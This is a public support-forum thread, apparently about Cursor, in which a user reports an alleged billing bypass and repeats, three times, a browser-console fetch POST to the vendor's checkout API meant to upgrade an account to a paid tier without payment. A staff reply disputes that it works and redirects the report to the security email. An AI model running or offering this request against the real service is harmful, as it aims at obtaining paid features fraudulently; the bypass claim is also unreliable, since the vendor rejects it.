URGENT SECURITY ALERT: 100% Free Billing Bypass Actively Abused via Alipay

Support Bug Reports
1

Where does the bug appear (feature/product)?

Somewhere else…

Describe the Bug

Hello Cursor Team,

I am writing to report a critical billing bypass vulnerability I have discovered regarding the subscription upgrade process.

It appears that users can bypass the payment gateway entirely and upgrade to the “Ultra” tier for free by directly sending a specific POST request to your checkout API. This issue seems to be particularly exploited by users utilizing Alipay in the Chinese region.

Vulnerability Details:
Users can open the developer console on the dashboard and execute the following JavaScript code to instantly trigger the bug without any actual payment being processed:

JavaScript
fetch(‘https://cursor.com/api/checkout’, {
method: ‘POST’,
headers: {
‘Content-Type’: ‘application/json’
},
body: JSON.stringify({
tier: ‘ultra’,
allowAutomaticPayment: true,
yearly: false
})
});
Impact:
This method is currently being heavily abused to gain unauthorized access to premium features, leading to direct financial loss for your company.

Suggested Mitigation:
Please implement strict server-side validation to ensure that a successful payment callback from the payment provider (e.g., Alipay, Stripe) has been received and verified before provisioning the “Ultra” tier to any user account.

I highly recommend investigating this endpoint and patching it as soon as possible.

Best regards,

Steps to Reproduce

fetch(‘https://cursor.com/api/checkout’, {
method: ‘POST’,
headers: {
‘Content-Type’: ‘application/json’
},
body: JSON.stringify({
tier: ‘ultra’,
allowAutomaticPayment: true,
yearly: false
})
});

Operating System

Windows 10/11

Version Information

Kind people

Does this stop you from using Cursor

No - Cursor works, but with this issue

3

Vulnerability Details & Steps to Reproduce: I have identified that this bypass has a specific prerequisite tied to the Alipay payment gateway. Users are executing the following steps:

Step 1: The user must first purchase a “Pro” plan using Alipay (a Chinese payment method). Step 2: Once the Pro plan is active, the user goes to their dashboard and opens the browser’s developer console. Step 3: The user executes the following JavaScript code to hit the checkout API directly:

JavaScript

fetch('https://cursor.com/api/checkout', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    tier: 'ultra',
    allowAutomaticPayment: true,
    yearly: false
  })
});

Result: > The system instantly upgrades the account to the “Ultra” tier without charging the price difference or triggering any further payment validation.

7

Hey, thanks for the report, but the scenario you described isn’t a working exploit. The /api/checkout endpoint doesn’t provision subscriptions directly. It either creates a Stripe Checkout session, which requires a real payment, or it triggers an internal flow that requires an existing subscription and a valid payment method. A simple POST request can’t bypass payment.

If you’ve actually found a security issue, the right channel is [email protected], not a public forum. Posting detailed steps, even if they don’t work, goes against our community guidelines.

I’m closing this thread. If you have concrete proof of a working exploit, please email [email protected].